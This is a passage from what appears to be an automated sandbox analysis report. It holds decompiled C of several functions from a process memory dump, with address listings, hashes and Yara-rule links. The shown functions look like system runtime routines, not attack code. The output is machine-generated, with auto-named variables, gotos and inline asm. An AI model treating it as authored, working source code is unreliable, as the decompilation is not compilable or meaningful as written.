							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E04A08ED6(_t102, _t98);
						}
						_t76 = _v44;
						E04952280(_t58, _v44);
						E0495DD82(_v44, _t102, _t98);
						E0495B944(_t102, _v5);
						return E0494FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x4a28628; // 0x0
							_v28 = _t67;
							_t68 =  *0x4a2862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x4a28628; // 0x0
						_t105 = _v28;
						_t80 =  *0x4a2862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x49ffb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                                  0x0495dbe9
                                                                  0x0495dbf2
                                                                  0x0495dbf7
                                                                  0x0495dbf9
                                                                  0x0495dbfc
                                                                  0x0495dc00
                                                                  0x0495dc03
                                                                  0x0495dc14
                                                                  0x0495dd54
                                                                  0x0495dd54
                                                                  0x0495dd54
                                                                  0x0495dc18
                                                                  0x0495dc1d
                                                                  0x0495dc1d
                                                                  0x0495dc32
                                                                  0x0495dc3b
                                                                  0x0495dc3e
                                                                  0x0495dc46
                                                                  0x0495dd5b
                                                                  0x0495dd62
                                                                  0x0495dd64
                                                                  0x0495dd67
                                                                  0x0495dd69
                                                                  0x0495dd6b
                                                                  0x0495dd6e
                                                                  0x0495dd70
                                                                  0x0495dd73
                                                                  0x0495dd73
                                                                  0x00000000
                                                                  0x0495dc4c
                                                                  0x0495dc4e
                                                                  0x049a3ae3
                                                                  0x049a3ae8
                                                                  0x049a3aea
                                                                  0x0495dce7
                                                                  0x0495dce9
                                                                  0x0495dcec
                                                                  0x0495dcee
                                                                  0x0495dcf0
                                                                  0x0495dcf3
                                                                  0x0495dcf5
                                                                  0x049a3af2
                                                                  0x049a3af5
                                                                  0x049a3af5
                                                                  0x0495dd06
                                                                  0x0495dd08
                                                                  0x0495dd0b
                                                                  0x0495dd12
                                                                  0x049a3b08
                                                                  0x0495dd18
                                                                  0x0495dd18
                                                                  0x0495dd18
                                                                  0x0495dd20
                                                                  0x0495dd23
                                                                  0x049a3b16
                                                                  0x049a3b16
                                                                  0x0495dd29
                                                                  0x0495dd2d
                                                                  0x0495dd36
                                                                  0x0495dd40
                                                                  0x0495dd51
                                                                  0x0495dd51
                                                                  0x0495dc54
                                                                  0x0495dc59
                                                                  0x0495dc59
                                                                  0x0495dc5e
                                                                  0x0495dc5e
                                                                  0x0495dc63
                                                                  0x0495dc66
                                                                  0x0495dc6b
                                                                  0x0495dc78
                                                                  0x0495dc7b
                                                                  0x0495dc81
                                                                  0x0495dc81
                                                                  0x0495dc83
                                                                  0x0495dc89
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0495dd7b
                                                                  0x0495dd7b
                                                                  0x0495dc8f
                                                                  0x0495dc8f
                                                                  0x0495dc92
                                                                  0x0495dc99
                                                                  0x0495dc9f
                                                                  0x0495dca5
                                                                  0x0495dcaa
                                                                  0x0495dcaa
                                                                  0x0495dcb3
                                                                  0x0495dcb8
                                                                  0x0495dcbb
                                                                  0x0495dcc1
                                                                  0x0495dccf
                                                                  0x0495dcd2
                                                                  0x0495dcd5
                                                                  0x0495dcd7
                                                                  0x0495dcda
                                                                  0x0495dcdc
                                                                  0x0495dcdc
                                                                  0x0495dce2
                                                                  0x0495dce4
                                                                  0x00000000
                                                                  0x0495dce4

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c22df68a688499b47efaa986f182129e5ca9a4c1761d0e47ed8aeaa0bda589a9
                                                                  • Instruction ID: c6c754cf7ff8ce5d73c6e7266b01576659bac26d89550ed733138842642130f2
                                                                  • Opcode Fuzzy Hash: c22df68a688499b47efaa986f182129e5ca9a4c1761d0e47ed8aeaa0bda589a9
                                                                  • Instruction Fuzzy Hash: 6051AF71A00615DFCB24DFA8C480AAEFBF5FB89310F20866AD955A7354EB35B944CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0494EF40, Relevance: .1, Instructions: 147COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 96%
                                                                  			E0494EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E04939080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77dfc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E04932D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                                  0x0494ef4b
                                                                  0x0494ef4d
                                                                  0x0494ef57
                                                                  0x0494f0bd
                                                                  0x0494f0c2
                                                                  0x0494f0d2
                                                                  0x0494f0d2
                                                                  0x0494f0c2
                                                                  0x0494ef5d
                                                                  0x0494ef5f
                                                                  0x0494ef67
                                                                  0x0494ef6a
                                                                  0x0494ef6d
                                                                  0x0494ef74
                                                                  0x0494ef7f
                                                                  0x0494ef82
                                                                  0x0494ef82
                                                                  0x0494ef86
                                                                  0x0494ef88
                                                                  0x0494ef8c
                                                                  0x0494ef8f
                                                                  0x0494ef8f
                                                                  0x0494ef8f
                                                                  0x00000000
                                                                  0x0494ef91
                                                                  0x0494ef93
                                                                  0x0494efc4
                                                                  0x0494efc4
                                                                  0x0494efc4
                                                                  0x0494efca
                                                                  0x0494efd0
                                                                  0x0494f0a6
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0494f0af
                                                                  0x0499bb06
                                                                  0x0499bb0a
                                                                  0x0494f0b5
                                                                  0x0494f0b5
                                                                  0x0494f0b5
                                                                  0x0494f0b5
                                                                  0x00000000
                                                                  0x0494efd6
                                                                  0x0494efd9
                                                                  0x0494f0de
                                                                  0x0494f0e2
                                                                  0x0494efdf
                                                                  0x0494efdf
                                                                  0x0494efdf
                                                                  0x0494efe5
                                                                  0x0499bafc
                                                                  0x0499bafc
                                                                  0x0494efe5
                                                                  0x0494efeb
                                                                  0x0494efed
                                                                  0x0494f00f
                                                                  0x0494f011
                                                                  0x0494f01a
                                                                  0x0494f01d
                                                                  0x0494f021
                                                                  0x0494f028
                                                                  0x0494f029
                                                                  0x0494f029
                                                                  0x0494f02c
                                                                  0x00000000
                                                                  0x0494f02c
                                                                  0x0494eff3
                                                                  0x0494eff9
                                                                  0x0494f0ea
                                                                  0x0494f0ed
                                                                  0x0494f0ef
                                                                  0x00000000
                                                                  0x0494f0ef
                                                                  0x0494f003
                                                                  0x0499bb12
                                                                  0x0494f045
                                                                  0x0494f049
                                                                  0x0494f051
                                                                  0x0494f09e
                                                                  0x0494f0a0
                                                                  0x0494f0a0
                                                                  0x0494f09e
                                                                  0x0494f053
                                                                  0x0494f064
                                                                  0x0494f064
                                                                  0x0494f06b
                                                                  0x0499bb1a
                                                                  0x0499bb1a
                                                                  0x0494f071
                                                                  0x0494f071
                                                                  0x0494f07d
                                                                  0x0494f082
                                                                  0x0494f08f
                                                                  0x0494f08f
                                                                  0x0494f009
                                                                  0x0494f00d
                                                                  0x00000000
                                                                  0x0494f00d
                                                                  0x0494efd0
                                                                  0x0494ef97
                                                                  0x0494efa5
                                                                  0x0494efaa
                                                                  0x00000000
                                                                  0x0494efac
                                                                  0x0494efac
                                                                  0x0494efac
                                                                  0x00000000
                                                                  0x0494efb2
                                                                  0x0494f036
                                                                  0x0494f03a
                                                                  0x0494f040
                                                                  0x0494f090
                                                                  0x00000000
                                                                  0x0494f092
                                                                  0x0494f042
                                                                  0x00000000
                                                                  0x0494f042
                                                                  0x0494efb7
                                                                  0x0494efb9
                                                                  0x0494efbc
                                                                  0x0494efb0
                                                                  0x0494efb0
                                                                  0x00000000
                                                                  0x0494efbe
                                                                  0x0494efbe
                                                                  0x0494efc1
                                                                  0x00000000
                                                                  0x0494efc1
                                                                  0x0494efbc
                                                                  0x0494efaa
                                                                  0x0494ef91

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                  • Instruction ID: d4939415232965ee8bb1c763e85c50997a8d9a1faeabed8934e4218512137a3c
                                                                  • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                  • Instruction Fuzzy Hash: 7D51EE30A0424A9FDF24CF68C190BAEBBB6BFC5304F1881B8D54597285D375B988D761
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04A0740D, Relevance: .1, Instructions: 141COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 84%
                                                                  			E04A0740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0498D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0497F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L04954620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L04954620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0497F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L04954620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                                  0x04a0740d
                                                                  0x04a0740d
                                                                  0x04a07412
                                                                  0x04a07413
                                                                  0x04a07416
                                                                  0x04a07418
                                                                  0x04a0741c
                                                                  0x04a0741f
                                                                  0x04a07422
                                                                  0x04a07422
                                                                  0x04a07428
                                                                  0x04a0742a
                                                                  0x04a0742a
                                                                  0x04a07451
                                                                  0x04a07432
                                                                  0x04a0744f
                                                                  0x04a0744f
                                                                  0x00000000
                                                                  0x04a07434
                                                                  0x04a07438
                                                                  0x04a07443
                                                                  0x04a07517
                                                                  0x04a07517
                                                                  0x04a0751a
                                                                  0x04a07535
                                                                  0x04a07520
                                                                  0x04a07527
                                                                  0x04a0752c
                                                                  0x04a07531
                                                                  0x04a07533
                                                                  0x00000000
                                                                  0x04a07533
                                                                  0x00000000
                                                                  0x04a07531
                                                                  0x04a0754b
                                                                  0x04a0754f
                                                                  0x04a0755c
                                                                  0x04a0755c
                                                                  0x04a0755f
                                                                  0x04a07560
                                                                  0x04a07561
                                                                  0x04a07562
                                                                  0x04a07563
                                                                  0x04a07568
                                                                  0x04a0756a
                                                                  0x04a0756c
                                                                  0x04a0756d
                                                                  0x04a0756d
                                                                  0x04a0756f
                                                                  0x04a07572
                                                                  0x04a07574
                                                                  0x04a07577
                                                                  0x04a0757c
                                                                  0x04a0757f
                                                                  0x00000000
                                                                  0x04a07551
                                                                  0x04a07551
                                                                  0x04a07551
                                                                  0x04a07553
                                                                  0x04a07553
                                                                  0x04a07449
                                                                  0x04a07449
                                                                  0x04a0744c
                                                                  0x04a0744c
                                                                  0x00000000
                                                                  0x04a0744c
                                                                  0x04a07443
                                                                  0x04a0750e
                                                                  0x04a07514
                                                                  0x04a07514
                                                                  0x04a07455
                                                                  0x04a07469
                                                                  0x04a0746d
                                                                  0x00000000
                                                                  0x04a07473
                                                                  0x04a07473
                                                                  0x04a07476
                                                                  0x04a07480
                                                                  0x04a07484
                                                                  0x04a0748e
                                                                  0x04a07493
                                                                  0x04a07493
                                                                  0x04a07496
                                                                  0x04a07499
                                                                  0x04a074a1
                                                                  0x04a074b1
                                                                  0x04a074b5
                                                                  0x00000000
                                                                  0x04a074bb
                                                                  0x04a074c1
                                                                  0x04a074c1
                                                                  0x04a074c4
                                                                  0x04a074c5
                                                                  0x04a074c6
                                                                  0x04a074c7
                                                                  0x04a074c8
                                                                  0x04a074cd
                                                                  0x00000000
                                                                  0x04a074d3
                                                                  0x04a074d3
                                                                  0x04a074d6
                                                                  0x04a074d8
                                                                  0x04a074db
                                                                  0x04a074dd
                                                                  0x04a074e0
                                                                  0x04a074e7
                                                                  0x04a074ee
                                                                  0x04a074ee
                                                                  0x04a074f4
                                                                  0x04a074f9
                                                                  0x00000000
                                                                  0x04a074fb
                                                                  0x04a074fb
                                                                  0x04a074fd
                                                                  0x04a07500
                                                                  0x04a07503
                                                                  0x04a07505
                                                                  0x04a07505
                                                                  0x04a074f9
                                                                  0x00000000
                                                                  0x04a074cd
                                                                  0x04a074b5
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                  • Instruction ID: 50ed8af63bd2270db393792d84023c1bd1d7eb70ffe886d38e96a01fdbde8054
                                                                  • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                  • Instruction Fuzzy Hash: 60517D71600606EFDB15CF14D480A96BBB5FF49304F15C1BAE9089F262E772F986CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04962990, Relevance: .1, Instructions: 133COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 97%
                                                                  			E04962990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x4a0ff00);
				E0498D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x4911664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0497E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x4911668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E049B51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x491166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E04962AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E04946600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E04962C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E0494EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E04962AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E04962C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E04962ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0498D0D1(_t62);
				goto L28;
			}





















                                                                  0x04962990
                                                                  0x04962992
                                                                  0x04962997
                                                                  0x049629a3
                                                                  0x049629a6
                                                                  0x049629ab
                                                                  0x049629ad
                                                                  0x049629b2
                                                                  0x049a5c80
                                                                  0x049629b8
                                                                  0x049629b8
                                                                  0x049629bb
                                                                  0x049629c0
                                                                  0x049629c5
                                                                  0x049629c6
                                                                  0x049629c6
                                                                  0x049629cb
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049629cd
                                                                  0x049629d0
                                                                  0x049629d9
                                                                  0x049629db
                                                                  0x049629dd
                                                                  0x04962a7f
                                                                  0x04962a84
                                                                  0x04962a87
                                                                  0x04962a89
                                                                  0x049a5ca1
                                                                  0x049a5ca3
                                                                  0x00000000
                                                                  0x04962a8f
                                                                  0x04962a8f
                                                                  0x00000000
                                                                  0x04962a8f
                                                                  0x00000000
                                                                  0x049629e3
                                                                  0x049629e3
                                                                  0x049629e3
                                                                  0x00000000
                                                                  0x049629e3
                                                                  0x049629dd
                                                                  0x00000000
                                                                  0x049629db
                                                                  0x049629e6
                                                                  0x049629e9
                                                                  0x049629eb
                                                                  0x049629ed
                                                                  0x049629f3
                                                                  0x049629f5
                                                                  0x049629f8
                                                                  0x049629fa
                                                                  0x04962a97
                                                                  0x04962a9a
                                                                  0x04962a9d
                                                                  0x04962add
                                                                  0x00000000
                                                                  0x04962a9f
                                                                  0x04962aa2
                                                                  0x04962aa5
                                                                  0x04962aa8
                                                                  0x04962aab
                                                                  0x049a5cab
                                                                  0x049a5caf
                                                                  0x049a5cc5
                                                                  0x049a5cda
                                                                  0x049a5cdc
                                                                  0x049a5cdf
                                                                  0x049a5ce5
                                                                  0x00000000
                                                                  0x049a5ceb
                                                                  0x049a5ced
                                                                  0x049a5cee
                                                                  0x00000000
                                                                  0x049a5cee
                                                                  0x049a5cb1
                                                                  0x049a5cb4
                                                                  0x049a5cb9
                                                                  0x049a5cbb
                                                                  0x00000000
                                                                  0x049a5cbd
                                                                  0x049a5cbd
                                                                  0x00000000
                                                                  0x049a5cbd
                                                                  0x049a5cbb
                                                                  0x04962ab1
                                                                  0x04962ab1
                                                                  0x04962ac4
                                                                  0x04962ac6
                                                                  0x04962ac6
                                                                  0x00000000
                                                                  0x04962ac6
                                                                  0x04962aab
                                                                  0x00000000
                                                                  0x04962a00
                                                                  0x04962a09
                                                                  0x04962a0e
                                                                  0x04962a21
                                                                  0x04962a24
                                                                  0x04962a35
                                                                  0x04962a3a
                                                                  0x04962a3d
                                                                  0x04962a42
                                                                  0x04962a59
                                                                  0x04962a59
                                                                  0x04962a5c
                                                                  0x04962a5f
                                                                  0x04962a5f
                                                                  0x049629fa
                                                                  0x049629f3
                                                                  0x04962a64
                                                                  0x04962a64
                                                                  0x04962a6b
                                                                  0x04962a6b
                                                                  0x04962a6d
